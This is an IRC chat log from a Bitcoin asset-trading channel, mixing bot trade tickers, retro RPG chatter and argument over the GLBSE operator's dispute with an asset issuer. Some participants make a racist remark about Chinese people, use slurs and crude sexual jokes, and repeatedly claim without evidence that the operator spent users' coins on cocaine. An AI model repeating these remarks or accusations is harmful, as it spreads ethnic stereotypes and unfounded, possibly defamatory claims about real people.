01:40:17 lolol Oct 03 01:40:25 and people say I suck at math >_> Oct 03 01:40:32 so, 100 + 100 + 600 = 800 at current mkt Oct 03 01:40:44 mircea_popescu: yeah pretty much Oct 03 01:40:50 !ticker dmc Oct 03 01:40:53 [GLBSE:DMC] [Bid: 0.02] [Ask: 0.07499998] [Spread: 0.05499998] [Last: 0.02] [24hVol: 16.37999649] [7dAvg: 0.07139604] Oct 03 01:41:05 market hates you. Oct 03 01:41:22 probably. Oct 03 01:41:26 then again smickles was trading .3 / 1.1 yest in spite of being worth ~1.x Oct 03 01:41:45 What happen with all the DMC drama anyhow. Oct 03 01:41:51 Doffx: nefario does coke. Oct 03 01:42:02 Well I'm sure of that. Oct 03 01:42:13 and now everyone is jumping ship Oct 03 01:42:28 The Glbse Ship? Oct 03 01:42:36 some, some are jumping the entire market Oct 03 01:42:37 not sure how anyone can stay at this point Oct 03 01:42:45 its suicide Oct 03 01:42:46 I left a long time ago Oct 03 01:42:53 I own 1 stock and I tried to sell it Oct 03 01:42:58 a long, long time ago... but i can still remember Oct 03 01:43:05 mircea_popescu: sssh Oct 03 01:43:10 But then the .0034 bidwall got put up and fucked me. Oct 03 01:43:15 I own 1 DMC and a soon as someone pays me one million btc for it, im out Oct 03 01:43:43 I guess Im stuck slowly buying everything back Oct 03 01:45:28 might take quite a few months =/ Oct 03 01:48:38 I need something to buy... Oct 03 01:48:49 so just buy up all the dmc on the market Oct 03 01:48:54 [GLBSE] [GIGAMINING] 10 @ 0.5989 = 5.989 BTC [-] Oct 03 01:48:56 [GLBSE] [GIGAMINING] 10 @ 0.59 = 5.9 BTC [-] Oct 03 01:48:56 [GLBSE] [GIGAMINING] 1 @ 0.59 BTC [-] Oct 03 01:49:00 Meh Oct 03 01:54:57 [MPEX] [S.MPOE] 50100 @ 0.0003653 = 18.3015 BTC [+] Oct 03 01:55:33 [GLBSE] [BFLS.RIG] 5 @ 0.9 = 4.5 BTC [+] Oct 03 01:55:35 [GLBSE] [BFLS.RIG] 2 @ 0.94 = 1.88 BTC [+] Oct 03 01:55:35 [GLBSE] [BFLS.RIG] 10 @ 0.95 = 9.5 BTC [+] Oct 03 01:55:36 [GLBSE] [BFLS.RIG] 1 @ 0.97 BTC [+] Oct 03 01:55:38 [GLBSE] [BFLS.RIG] 10 @ 0.97899 = 9.7899 BTC [+] Oct 03 01:55:39 [GLBSE] [BFLS.RIG] 39 @ 0.979 = 38.181 BTC [+] Oct 03 01:55:40 [GLBSE] [BFLS.RIG] 1 @ 0.979 BTC [+] Oct 03 01:55:41 [GLBSE] [BFLS.RIG] 1 @ 0.98 BTC [+] Oct 03 01:55:53 http://csrc.nist.gov/groups/ST/hash/sha-3/winner_sha-3.html Oct 03 01:58:25 [GLBSE] [BFLS.RIG] 2 @ 0.98 = 1.96 BTC [+] Oct 03 02:03:57 https://bitcointalk.org/index.php?topic=92423.0 Oct 03 02:04:04 hey, i got a bunch of addies in that list. go me. Oct 03 02:18:29 lol http://www.reddit.com/r/Bitcoin/comments/10sxic/til_the_biggest_nerd_i_know_had_never_heard_of/ sgornick wins Oct 03 02:20:09 [MPEX] [S.MPOE] 17000 @ 0.00036192 = 6.1526 BTC [-] Oct 03 02:21:09 http://www.reddit.com/r/fossworldproblems Oct 03 02:21:10 wat Oct 03 02:21:22 ya i was looking at that Oct 03 02:22:42 "I was turned off by an otherwise-appealing open-source project after seeing that Zynga had contributed to it" Oct 03 02:22:43 totally. Oct 03 02:23:26 I understand how he feels Oct 03 02:23:37 "I want to write a simple program in python with two libraries, but one requires python2, and the other python3." Oct 03 02:23:38 fffffffffffffffff Oct 03 02:23:45 Diablo-D3: I like this subreddit xD Oct 03 02:24:01 "I want to write a simple program in python with two libraries, but one requires python2, and the other python3." Oct 03 02:24:02 ahahaha Oct 03 02:24:08 o wow Oct 03 02:24:10 SAME Oct 03 02:24:15 lmao Oct 03 02:24:18 eheheeh Oct 03 02:25:04 http://25.media.tumblr.com/tumblr_mb77t0ygoF1qfrvjzo1_500.png this is kinda win Oct 03 02:28:59 yeah, clearly bitcoin is fucktarded Oct 03 02:29:51 "I used Bash for three years before learning about tab completion" Oct 03 02:29:53 THE FUCK Oct 03 02:29:56 HOW IS THAT POSSIBLE Oct 03 02:30:27 :D Oct 03 02:34:24 Win? Try "Dancing Mad". Oct 03 02:37:12 BTC-Mining: which version? Oct 03 02:37:29 because the black mages has a good version of it Oct 03 02:37:49 The full original version is good enough for me. Oct 03 02:38:52 fuck, now want to play ff6 Oct 03 02:38:58 but dont want terra subplot Oct 03 02:40:43 actually, Im almost considering playing either ToP or ff5 again Oct 03 02:42:45 or maybe seiken densetsu 3 Oct 03 02:45:21 Eh, I'd need to get ff5 or seiken densetsu 3 Oct 03 02:45:27 [MPEX] [S.MPOE] 21006 @ 0.00036077 = 7.5783 BTC [-] Oct 03 02:45:43 I only played seiken 1/2 and ff 1/4/6 Oct 03 02:46:05 I just don't have so much time to play everything. Oct 03 02:46:51 5 is really damned good Oct 03 02:47:02 ToP is really damned good too Oct 03 02:48:03 I pretty much never played anything that was not released in North America Oct 03 02:48:30 [GLBSE] [RAREEARTH] 1 @ 0.00999999 BTC [+] Oct 03 02:49:03 ahh too bad Oct 03 02:49:40 I dont think I can ever play earthbound again Oct 03 02:49:43 its just too perfect Oct 03 02:50:19 BTC-Mining: tales of phantasia had a jpop intro. on the snes. with lyrics. Oct 03 02:51:15 and star ocean was good too Oct 03 02:51:19 and so was terranigma Oct 03 02:52:59 oh, and the illusion of gaia Oct 03 02:53:45 played illusion of gaia and star ocean Oct 03 02:54:09 not terranigma/ToP/earthbound Oct 03 02:54:13 terranigma's internal project name was illusion of gaia 2, but they're unrelated games (same way FF games are) Oct 03 02:54:24 star ocean was made by the same team that did tales of phantaisa Oct 03 02:54:35 star ocean and ToP are impressive uses of the snes hardware Oct 03 02:54:52 oh, and I assume you've already played chrono trigger Oct 03 02:57:38 BTC-Mining: Im not sure if you know this, but the black mages is nobuo uematsu's rock band Oct 03 02:58:12 him and two other squaresoft composers Oct 03 02:58:48 yeah of course, never heard anything from them tho Oct 03 02:58:53 [GLBSE] [GSDPT] 34 @ 0.0033995 = 0.1156 BTC [+] Oct 03 02:58:59 https://www.youtube.com/watch?v=3YNfX1oU2XA Oct 03 02:59:00 and yes, I did play Chrono Trigger Oct 03 02:59:30 chrono trigger is the best rpg ever. on any platform. Oct 03 02:59:56 its basically portal for old school jrpgs Oct 03 03:00:06 everything that needs to be there is there Oct 03 03:00:13 but nothing more than that Oct 03 03:00:21 and it doesnt help I Oct 03 03:00:23 er Oct 03 03:00:31 and it doesnt help I've beaten it like 50 times Oct 03 03:01:04 I'm not sure why the cult around Chrono Trigger. Definitely one of the best I ever played but still... Oct 03 03:01:38 I dont quite get it either Oct 03 03:01:50 I mean, like, Ive played basically every great jrpg ever Oct 03 03:02:01 and ct still tops it and I cant figure out why Oct 03 03:03:16 I don't like that Black Mages version too much. Oct 03 03:03:29 try the earthbound papas one Oct 03 03:03:33 https://www.youtube.com/watch?v=pFm84RcUMmg Oct 03 03:04:37 Ah, I like real sounding chorus Oct 03 03:05:23 earthbound papas is nobuo uematsu's OTHER band. Oct 03 03:05:37 It's a better band. Oct 03 03:06:12 I also like this version: http://www.youtube.com/watch?v=OdWTJg6bf40&feature=related Oct 03 03:06:35 The fact it's synthetized is a bit annoying, especially for the chorus. Oct 03 03:06:49 yeah especially when theres very good synth choirs out there Oct 03 03:07:24 But the rest is perfect. Closer to SNES sounds. Oct 03 03:07:37 everything needed to do final fantasy music: ewql symphonic orchestra, ewql symphonic choir, ewql stormdrum Oct 03 03:07:57 Well listen to the link I posted Oct 03 03:08:04 yeah it kinda sucks =/ Oct 03 03:08:12 The choirs? yes Oct 03 03:08:30 It's the part the annoys me Oct 03 03:10:26 BTC-Mining: btw Oct 03 03:10:30 those three things i named? Oct 03 03:10:31 The later parts are better Oct 03 03:10:38 thats like $3000 worth of software Oct 03 03:10:40 and its just VST plugins Oct 03 03:10:51 ouch Oct 03 03:10:56 ewsqlso is like 5 DVDs or some shit Oct 03 03:11:12 [MPEX] [F.GIGA.ETF] 700 @ 0.00045505 = 0.3185 BTC [+] Oct 03 03:11:38 wait no, 9 Oct 03 03:16:00 "I think Bitcoin and cryptocurrency stands to challenge and has the potential to topple the very notion of unlawful trade, just like the printing press challenged and toppled the notion of unlawful speech." Oct 03 03:16:04 my thoughts exactly. Oct 03 03:17:07 unlawful speech? Oct 03 03:17:25 wth is this funny concept? Oct 03 03:18:28 right ? Oct 03 03:18:37 "controlled substances" ? control your mother. Oct 03 03:19:12 BTC-Mining: aren't you chinese? should be familiar with that concept Oct 03 03:19:27 man Oct 03 03:19:43 sqaure is fucktarded for not using this music in a ff6 port Oct 03 03:20:00 I'm not chinese, no Oct 03 03:20:15 \m/ o_o \m/ Oct 03 03:20:19 \m/ -_- \m/ Oct 03 03:20:20 \m/ o_o \m/ Oct 03 03:20:28 oh, I assumed the lack of logic and reasoning was cultural Oct 03 03:20:33 Which one? Oct 03 03:20:37 lmao Oct 03 03:20:38 my apologies Oct 03 03:20:41 dub: you almost owe me a new keyboard Oct 03 03:21:37 Diablo, which one? Oct 03 03:21:47 earthbound papas - dancing mad Oct 03 03:22:23 ah, the same one Oct 03 03:22:56 [GLBSE] [BDK.BND] 2 @ 0.0495 = 0.099 BTC [+] Oct 03 03:23:57 Some sounds are too low while most beats are just... way too high. Oct 03 03:24:31 [GLBSE] [BBBB] 140 @ 0.00016 = 0.0224 BTC [+] Oct 03 03:25:04 I can't have it loud enough without having the occasional blast shredding my eardrums. Oct 03 03:26:24 the way dancing mad was meant to be Oct 03 03:30:29 mircea_popescu: Have you thought about listing ASICMINER on mpex? Oct 03 03:31:12 rdponticelli wouldn't really qualify im affraid. Oct 03 03:31:13 he could Oct 03 03:31:22 it wouldnt be a passthrough either Oct 03 03:31:23 new business, no cash flow, why am i listing it ? Oct 03 03:31:23 No? Oct 03 03:31:39 friedcat will hold onto shares off glbse if you have enough Oct 03 03:31:44 Ok Oct 03 03:31:56 So anyway. Apparently I'm chinese for being on GLBSE, because it's cultural for chinese people to lack logic. Seems somewhat racist. Oct 03 03:31:57 if they actually deliver something at some point we can talk ofcourse, but atm seems premature Oct 03 03:31:57 Yea, that was my thought Oct 03 03:32:52 https://www.youtube.com/watch?v=LHbYIbleQP8 Oct 03 03:32:56 Well, let's see if they deliver Oct 03 03:36:20 [MPEX] [S.MPOE] 4300 @ 0.00036134 = 1.5538 BTC [+] Oct 03 03:36:21 "When I was your age, we rocket jumped all the way to school uphill, both ways, in boiling lava" Oct 03 03:36:32 [MPEX] [S.BVPS] 7800 @ 0.00351 = 27.378 BTC [+] Oct 03 03:42:15 [GLBSE] [COGNITIVE] 2 @ 0.57999999 = 1.16 BTC [-] Oct 03 03:42:17 [GLBSE] [COGNITIVE] 21 @ 0.58 = 12.18 BTC [+] Oct 03 03:44:59 So anyway. Apparently I'm chinese for being on GLBSE Oct 03 03:45:26 not sure I could have illustrated that point any better, thanks. Oct 03 03:50:03 lmao Oct 03 03:50:39 [GLBSE] [GOLD] 10 @ 0.00999998 = 0.1 BTC [+] Oct 03 03:53:02 [GLBSE] [COGNITIVE] 3 @ 0.5551005 = 1.6653 BTC [-] Oct 03 03:53:03 [GLBSE] [COGNITIVE] 7 @ 0.55510049 = 3.8857 BTC [-] Oct 03 03:53:56 [GLBSE] [COGNITIVE] 1 @ 0.55 BTC [-] Oct 03 03:59:32 Someone could summarize what the fuck is going on with nefarious and goat / TYGRR?? I've been off the topic a while now and I do not understand what happens. Oct 03 03:59:47 tbcoin: basically he delisted goat's assets without warning Oct 03 03:59:56 and now is trying to force a broken redeem system on goat Oct 03 04:00:04 and is also holding hostage any btc goat had on bitcoin Oct 03 04:00:42 Why hold the BTC? Oct 03 04:00:55 because nefario already spent it on coke Oct 03 04:01:47 hahaha Oct 03 04:01:50 thaks Oct 03 04:01:54 [MPEX] [S.MPOE] 9300 @ 0.00036162 = 3.3631 BTC [+] Oct 03 04:01:54 nefarious has given any explanation? forum I see lot of laps about the communication between them Oct 03 04:02:15 nope Oct 03 04:02:26 even bitcointalk admins have ordered him to give a good reason Oct 03 04:02:29 he hasnt responded Oct 03 04:02:31 Basically, long ago, someone created a scam asset called "GLBSE" Oct 03 04:02:38 delisted OK, SEC FUD, but freeze his account? Oct 03 04:02:42 it stems from goat holding an asset called GLBSE that was initailly a scam that nefario took over and said he would make legitimate but then didnt and now wants back for some reason Oct 03 04:02:43 BTC-Mining: yeah, ut that has nothing to do with it Oct 03 04:02:55 How so? Oct 03 04:03:00 or rather, even if nefario acted out of revenge, he STILL did it Oct 03 04:03:04 It is related. Oct 03 04:03:18 bascially nefario is retarded and glbse.com is a scam Oct 03 04:03:20 Nefario said he would honor those shares even if the scammer ran away with this. Oct 03 04:03:26 BTC-Mining: yes, and he cant Oct 03 04:03:40 because glbse shareholders will rape him in both holes Oct 03 04:03:50 So Chaang understood it as owning GLBSE and decided to buy shares. Oct 03 04:03:58 BTC-Mining: yes but Oct 03 04:04:09 that doesnt tie into why nefario closed goat's assets Oct 03 04:04:16 I withdraw all my funds at the moment to removal TYGRR Oct 03 04:04:18 nefario did it because goat made a big stink about it Oct 03 04:04:32 tbcoin: a lot of assets are leaving because of what nefario did to goat and dmc Oct 03 04:04:47 Now Nefario wanted to pay back for the shares but Chaan was unhappy about that and not owning a good part of GLBSE and wanted more for the shares than their IPO price if I recall right. Oct 03 04:05:11 Diablo-D3: is logical Oct 03 04:05:13 Chaang was demanding Nefario to be tagged as a scammer and was uncooperative. Oct 03 04:05:25 BTC-Mining: yeah, but the irony now is, nefario might get that tag Oct 03 04:05:42 Nefario decides to kick all Chaang's assets off of GLBSE. Oct 03 04:05:48 No warning. Oct 03 04:06:14 Should have at least allowed some delays for Chaang to prepare. Oct 03 04:06:38 But yeah, it's a big mess. Oct 03 04:07:12 business in bitcoin are full of BS... Oct 03 04:07:12 Smoovious: yes, but nefario still participated in that pissing contest Oct 03 04:07:18 and has destroyed glbse in the process Oct 03 04:07:21 tbcoin: some yes, some no Oct 03 04:09:30 then, in the magical case of pirate pay something someday, goat would take it or he still refuses to use the nefarious codes? Oct 03 04:11:21 the code scheme is broken, goat would be an idiot to entertain any notion of using the solution nefario provided Oct 03 04:12:11 maybe the entire ideea was to trap him in the scheme Oct 03 04:12:15 cause it's designed to fail. Oct 03 04:12:22 yes, it is. Look at Joel's posts for explanation Oct 03 04:12:49 What's the issue with the codes? Oct 03 04:13:12 insecure, unverifiable, relies on goat and nefario trusting each other which they obviously dont Oct 03 04:13:20 Smoovious: he must fulfill their holders, unless deemed in breach of contract after leaving glbse Oct 03 04:13:51 BTC-Mining they were sent in plain text over email Oct 03 04:13:54 consider i have a copy. Oct 03 04:14:25 Being on GLBSE at all requires trust in Nefario... Why would GLBSE platform hold any more trust than the codes Oct 03 04:14:30 its simpler than that, as soon as there is a dispute (e.g. someone tries to claim twice) everyone is fucked Oct 03 04:14:58 because goat cannot trust nefario to have not maliciously issued teh same code twice, and nefario cannot trust goat to have invented the double claim Oct 03 04:15:01 the sending of the code was done wrong by Nefario, that's for sure Oct 03 04:15:19 Well why doesn't he just regenerate the codes and send them encoded? Oct 03 04:16:05 BTC-Mining: is an option, now that reach an agreement ... Oct 03 04:17:19 is a fight, like many things other things around here, lengthen and lengthen until people forget and give up all for lost. Oct 03 04:17:42 BTC-Mining that'd be a step in the right direction Oct 03 04:17:48 That or implement a system for people to submit a BTC adress Nefario can then give to Chaang. Oct 03 04:17:49 but the problem dub cites still exists Oct 03 04:18:05 BTC-Mining he should put a system in where ppl can load their gpg signatures Oct 03 04:18:07 then give those to chang Oct 03 04:18:16 this would be incidentally rebuilding mpex, but hey. for a good cause... Oct 03 04:18:44 eh, whatever works. Oct 03 04:20:21 this system ios the only one workable. Oct 03 04:20:48 nobody can double claim, nefario can prove all the claims legitimate and goat can prove all the claims legitimate Oct 03 04:21:03 https://www.youtube.com/watch?v=og35U0d6WKY Oct 03 04:21:27 but the entire thing is a good exercise of "how would bitcoin look if nefario was satoshi" Oct 03 04:21:32 Smoovious: laywers would argue that by doing anything with the list goat is admitting _some_ liability for it Oct 03 04:21:52 lawyers might argue that as well Oct 03 04:22:10 oh, the "try it out see if it fits" solution that idiot proposed on the forum is the worst of them all. Oct 03 04:23:20 liability for nefarios unilateral decision to cause the problem? Oct 03 04:23:36 are you, perhaps, chinese? Oct 03 04:24:15 just been skimming this btw, quite interesting http://groups.psych.northwestern.edu/gentner/papers/YehGentner05.pdf Oct 03 04:27:05 [MPEX] [F.GIGA.ETF] 1100 @ 0.00045505 = 0.5006 BTC [+] Oct 03 04:31:23 "Shoe on head, sharpie in pooper and stfu." Oct 03 04:31:27 ahahaha she's criminal Oct 03 04:32:08 [GLBSE] [GSDPT] 150 @ 0.0033994 = 0.5099 BTC [-] Oct 03 04:32:16 sharpie in pooper? Oct 03 04:32:24 i dont get it Oct 03 04:32:34 its a /b/ thing Oct 03 04:32:51 [GLBSE] [GSDPT] 2 @ 0.0033994 = 0.0068 BTC [-] Oct 03 04:33:07 alternative to timestamping tits, stick sharpie in pooper Oct 03 04:33:36 a. Oct 03 04:33:37 kakobrekla http://polimedia.us/dtng/c/res/17150.html Oct 03 04:34:01 [GLBSE] [GSDPT] 20 @ 0.0033994 = 0.068 BTC [-] Oct 03 04:34:08 dub: don't talk about /b/ outside of /b/, newfag Oct 03 04:34:21 he's not even a fag. Oct 03 04:34:35 i was not implying he was homosexual. Oct 03 04:35:09 o, you can find a cute ass or two there Oct 03 04:35:52 mircea_popescu: http://www.urbandictionary.com/define.php?term=Newfag Oct 03 04:36:03 i know omg. Oct 03 04:36:04 novusordo: there are no rules, you're teh newfag Oct 03 04:36:47 but mircea_popescu is right, im an exfag Oct 03 04:37:00 fagocitosis Oct 03 04:38:26 ▲ Oct 03 04:38:30 ▲ ▲ Oct 03 04:39:01 lol Oct 03 04:52:09 [MPEX] [F.GIGA.ETF] 400 @ 0.00045504 = 0.182 BTC [-] Oct 03 04:52:10 [MPEX] [F.GIGA.ETF] 7056 @ 0.00045504 = 3.2108 BTC [-] Oct 03 04:52:11 [MPEX] [S.MPOE] 15000 @ 0.00036201 = 5.4302 BTC [+] Oct 03 04:52:12 [MPEX] [S.MPOE] 39400 @ 0.00036134 = 14.2368 BTC [-] Oct 03 05:11:02 [GLBSE] [ASICMINER] 2 @ 0.10999979 = 0.22 BTC [-] Oct 03 05:11:03 [GLBSE] [ASICMINER] 3 @ 0.1099998 = 0.33 BTC [+] Oct 03 05:19:05 [MPEX] [S.MPOE] 35500 @ 0.00036251 = 12.8691 BTC [+] Oct 03 05:20:43 [GLBSE] [BTC-MINING] 1 @ 0.959033 BTC [+] Oct 03 05:20:45 [GLBSE] [BTC-MINING] 5 @ 0.96 = 4.8 BTC [+] Oct 03 05:29:09 [GLBSE] [GSDPT] 35 @ 0.003301 = 0.1155 BTC [-] Oct 03 05:29:11 [GLBSE] [GSDPT] 315 @ 0.0033 = 1.0395 BTC [-] Oct 03 05:44:12 [MPEX] [F.GIGA.ETF] 1004 @ 0.00045487 = 0.4567 BTC [-] Oct 03 05:44:13 [MPEX] [F.GIGA.ETF] 5296 @ 0.00045487 = 2.409 BTC [-] Oct 03 05:56:17 https://bitcointalk.org/index.php?topic=112551.msg1240930#msg1240930 in the end this is kinda funnay Oct 03 05:56:19 Chaang-Noi ^^ Oct 03 05:56:45 what maged said about him being a scammer? Oct 03 05:57:06 its silly i cant use option 1 or option 2 until i have a new exchange Oct 03 05:57:23 i like how maged got all excited over the tech part :D Oct 03 05:57:42 next maged will come after me for not doing anthing Oct 03 05:57:50 but anyway, how many actual shareholders do you expect ? a hundred or so ? Oct 03 05:58:02 i have several hundred Oct 03 05:58:02 moo Oct 03 05:58:18 only opyion 3 is a quick fix Oct 03 05:59:09 several hundred ?! Oct 03 05:59:13 is maged saying made a new type of coin? Oct 03 05:59:14 so what's avg investment, .8 btc Oct 03 05:59:36 tygrr-[ had a value of like 40,000 btc Oct 03 05:59:42 i had like 8 assets Oct 03 05:59:56 i was like half of glbse Oct 03 06:00:09 o is it ? Oct 03 06:00:23 i wont be able to do this like hand Oct 03 06:00:27 by Oct 03 06:00:32 if that's the size then not really no Oct 03 06:00:45 esp the verification, will require coding Oct 03 06:00:51 yeah Oct 03 06:01:00 i dont code and maged can tell me to do so Oct 03 06:01:08 im sure the shareholders can make something forme Oct 03 06:01:14 lol Oct 03 06:01:22 that is if they accept tghe code system Oct 03 06:01:31 if i were them id tell nefario to fuck off Oct 03 06:01:37 they know im not an exchange Oct 03 06:01:54 Chaang-Noi: maged is still thinking about giving nefario a scammer tag and setup a url filter to label all glbse links as scams Oct 03 06:02:20 more people need to do that Oct 03 06:02:41 Chaang-Noi the solution is relatively easy for shareholders, they just import key to wallet and sign a message with the new addy Oct 03 06:02:42 that means that all my links to assets will be scams? Oct 03 06:02:51 it is a little complex for you tho as it will require custom coding Oct 03 06:02:58 i doubt he will get the tag Oct 03 06:03:08 maged was lied to by nefario so maged im sure is pissed Oct 03 06:03:17 but nefario im pretty sure will be protected Oct 03 06:03:32 nope Oct 03 06:03:39 you think theymos values his < 5k investment that highly ? Oct 03 06:03:40 theymos is selling his glbse shares Oct 03 06:03:43 im sure he has more coins. Oct 03 06:03:49 no where in my contract does it say i have to operate an exchange... Oct 03 06:04:04 i never said theymos Oct 03 06:04:50 well ya but there's not that many shares left you know Oct 03 06:05:10 [GLBSE] [OBSI.HRPT] 27 @ 0.007 = 0.189 BTC [+] Oct 03 06:05:12 [GLBSE] [OBSI.HRPT] 30 @ 0.00719999 = 0.216 BTC [+] Oct 03 06:05:13 [GLBSE] [OBSI.HRPT] 4 @ 0.00743803 = 0.0298 BTC [+] Oct 03 06:05:14 [GLBSE] [OBSI.HRPT] 1 @ 0.00749998 BTC [+] Oct 03 06:05:15 [GLBSE] [OBSI.HRPT] 2 @ 0.00870863 = 0.0174 BTC [+] Oct 03 06:05:16 [GLBSE] [OBSI.HRPT] 2 @ 0.00916005 = 0.0183 BTC [+] Oct 03 06:05:17 [GLBSE] [OBSI.HRPT] 1 @ 0.00975394 BTC [+] Oct 03 06:05:18 [GLBSE] [OBSI.HRPT] 1 @ 0.009788 BTC [+] Oct 03 06:05:19 [GLBSE] [OBSI.HRPT] 4 @ 0.00979627 = 0.0392 BTC [+] Oct 03 06:05:20 [GLBSE] [OBSI.HRPT] 192 @ 0.01 = 1.92 BTC [+] Oct 03 06:05:57 theymos is a little late on the share sale Oct 03 06:06:05 Bugpowder by like a day actually Oct 03 06:06:11 nefario really fucked him over on that one Oct 03 06:06:13 yeah Oct 03 06:06:22 he goes herpderp i shall sell some shares sat Oct 03 06:06:31 by monday people are "hey, are you selling cause of nefario ?" Oct 03 06:06:35 dude's wtf i have no ideea Oct 03 06:06:49 usagi did you ever explain what gives you the right to close .B before making sure everyone who trusted you with .A gets their coins back? Oct 03 06:06:53 sure he had no idea Oct 03 06:07:08 pigeons he has no such right. Oct 03 06:07:24 if A doesn't get full capital back after he closes B he's getting -'d to hell. Oct 03 06:07:49 might as well find a different mythological creature to be. Oct 03 06:08:29 [GLBSE] [BFLS.RIG] 2 @ 0.799001 = 1.598 BTC [-] Oct 03 06:08:30 [GLBSE] [BFLS.RIG] 1 @ 0.784 BTC [-] Oct 03 06:09:27 [MPEX] [S.MPOE] 24040 @ 0.00036228 = 8.7092 BTC [-] Oct 03 06:09:33 usagi: i'm serious i can't read every line of the channel and the forum. can you answer? Oct 03 06:10:35 usagi, what happens to NYAN.A if its assets go bad and B has already been refunded Oct 03 06:10:40 https://bitcointalk.org/index.php?topic=99497.msg1239970#msg1239970 so deeplink is out of asicminer cause of glbse connection. Oct 03 06:10:47 is this why you were asking earlier rdponticelli ? Oct 03 06:10:52 so NYAB.B is not collateral for NYAN.A? Oct 03 06:11:10 My concern with NYAN.A is sufficient that I sold out of B.MPCP.B at 5% below par today Oct 03 06:11:18 I thought CPA was toast? Oct 03 06:11:41 mircea_popescu: sort of Oct 03 06:11:48 usagi: so you are getting rid of the collateral for NYAN.A? Oct 03 06:11:55 okay.... bedtime for me I guess Oct 03 06:12:00 nn Oct 03 06:12:03 I have the same concern Oct 03 06:12:13 rdponticelli well i can see it, i tell you that. Oct 03 06:12:30 you will sign something with the key to an address that holds enough collateral to repay NYAN.A? Oct 03 06:12:38 I would like to own some asicminer, or some moore outside of glbse Oct 03 06:12:57 rdponticelli i think the asicminer ppl do private booking tho neh ? Oct 03 06:13:05 i dunno moore too well. Oct 03 06:13:25 mircea_popescu: yes, they do Oct 03 06:13:38 So it could be convenient Oct 03 06:14:25 [GLBSE] [HYDRO.BONDS] 1 @ 1.33 BTC [-] Oct 03 06:14:25 PROTIP: GLBSE is in th process fo blowing up and closing Oct 03 06:14:34 well just because the other funds you ran went out of business doesn't mean i don't trust you that NYAN.A is in zero danger, but the agreement was that NYAN.B could be sold and given to .A investors to ensure that? Oct 03 06:15:01 Yeah.. that is the other reason I got out of the B tranche. GLBSE could be gone by Nov 1st. Oct 03 06:15:02 dub ya think ? Oct 03 06:15:12 [GLBSE] [YABMC] 1 @ 0.07479999 BTC [-] Oct 03 06:15:12 time to make a bets of bitcoin bet Oct 03 06:15:15 Bugpowder what's the connection between .b and glbbq ? Oct 03 06:15:26 NYAN.A Oct 03 06:15:32 if nefario has the scammer tag it will hurt glbse im sure Oct 03 06:15:35 100 btc out of 1100 ? Oct 03 06:15:39 uhh an who knows what Patrick is exposed to Oct 03 06:15:44 but you need to close .A first Oct 03 06:15:45 pirate lol Oct 03 06:15:48 is that transparent? Oct 03 06:15:57 patrick is mostly exposed to his paycheck, which is why he gets the trust Oct 03 06:16:33 yes but how is that not screwing over .A? Oct 03 06:16:33 i have no doubt he made massive losses, but i'm pretty sure he limited his investments to what he can actually cover, unlike pretty much everyone else. Oct 03 06:16:33 I see Oct 03 06:16:57 well I probably acted rashly Oct 03 06:17:08 gotta stop trading on 2 cups of coffee and no breakfast Oct 03 06:17:20 obviously this is speculation. but the guy is actually licensed to do finance Oct 03 06:17:21 but .A was collateralized by .B and now is "trust me" Oct 03 06:17:46 just when it was getting good Oct 03 06:17:48 laterrrr Oct 03 06:18:16 [GLBSE] [HYDRO.BONDS] 3 @ 1.32599 = 3.978 BTC [-] Oct 03 06:18:18 [GLBSE] [HYDRO.BONDS] 1 @ 1.32589 BTC [-] Oct 03 06:18:33 ok, sounds like .A is a worse deal than it was earlier for sure now Oct 03 06:19:45 so what if something on NYAN.A goes bad? Oct 03 06:19:59 !ticker nyan.a Oct 03 06:20:02 [GLBSE:NYAN.A] [Bid: 0.8104] [Ask: 0.98] [Spread: 0.1696] [Last: 0.99] [24hVol: ] [7dAvg: 0.98559992] Oct 03 06:20:22 pity glbse has no sane 30day volume Oct 03 06:20:31 with all their depth the 24h is meaningless. Oct 03 06:20:32 but .C is the one with the OBSI.HRPT? Oct 03 06:20:50 i think they all have obsi.hrpt Oct 03 06:21:02 well surely not the "low risk only one" Oct 03 06:21:13 i think it did atleast Oct 03 06:21:32 !ticker cpa Oct 03 06:21:41 [GLBSE:CPA] [Bid: 0.016] [Ask: 0.02999999] [Spread: 0.01399999] [Last: 0.015] [24hVol: 1.69248001] [7dAvg: 0.03625638] Oct 03 06:21:44 okay it currently has no hrpt Oct 03 06:21:47 but idd Oct 03 06:21:48 did Oct 03 06:21:53 i dot keep up with it all Oct 03 06:21:58 dont* Oct 03 06:22:44 its fine cause you can always use NYAN.B to cover it. except when ther is no .B to cover it Oct 03 06:23:13 [GLBSE] [GIGAMINING] 2 @ 0.58000005 = 1.16 BTC [-] Oct 03 06:23:15 [GLBSE] [GIGAMINING] 1 @ 0.58000004 BTC [-] Oct 03 06:23:16 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Oct 03 06:23:18 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Oct 03 06:23:19 [GLBSE] [GIGAMINING] 1 @ 0.5602 BTC [-] Oct 03 06:23:20 [GLBSE] [GIGAMINING] 1 @ 0.56000002 BTC [-] Oct 03 06:23:21 [GLBSE] [GIGAMINING] 6 @ 0.56 = 3.36 BTC [-] Oct 03 06:23:22 [GLBSE] [GIGAMINING] 8 @ 0.556 = 4.448 BTC [-] Oct 03 06:23:23 [GLBSE] [GIGAMINING] 2 @ 0.5511 = 1.1022 BTC [-] Oct 03 06:23:24 [GLBSE] [GIGAMINING] 4 @ 0.5508 = 2.2032 BTC [-] Oct 03 06:23:25 [GLBSE] [GIGAMINING] 1 @ 0.5502 BTC [-] Oct 03 06:23:26 [GLBSE] [GIGAMINING] 1 @ 0.55 BTC [-] Oct 03 06:23:28 [GLBSE] [GIGAMINING] 10 @ 0.55 = 5.5 BTC [-] Oct 03 06:23:29 [GLBSE] [GIGAMINING] 2 @ 0.55 = 1.1 BTC [-] Oct 03 06:23:36 does cpa sign an address that has the funds to back it? Oct 03 06:23:42 usagi pigeons has a good point, if this blows up in yourface you will be accused of fraud Oct 03 06:24:18 [GLBSE] [YABMC] 1 @ 0.0733 BTC [-] Oct 03 06:24:19 [GLBSE] [YABMC] 2 @ 0.07320004 = 0.1464 BTC [-] Oct 03 06:24:21 [GLBSE] [YABMC] 6 @ 0.07320002 = 0.4392 BTC [-] Oct 03 06:24:22 [GLBSE] [YABMC] 2 @ 0.07315 = 0.1463 BTC [-] Oct 03 06:24:23 [GLBSE] [YABMC] 1 @ 0.07315 BTC [-] Oct 03 06:24:24 [GLBSE] [YABMC] 4 @ 0.07312 = 0.2925 BTC [-] Oct 03 06:24:25 [GLBSE] [YABMC] 18 @ 0.0731 = 1.3158 BTC [-] Oct 03 06:24:26 [GLBSE] [YABMC] 16 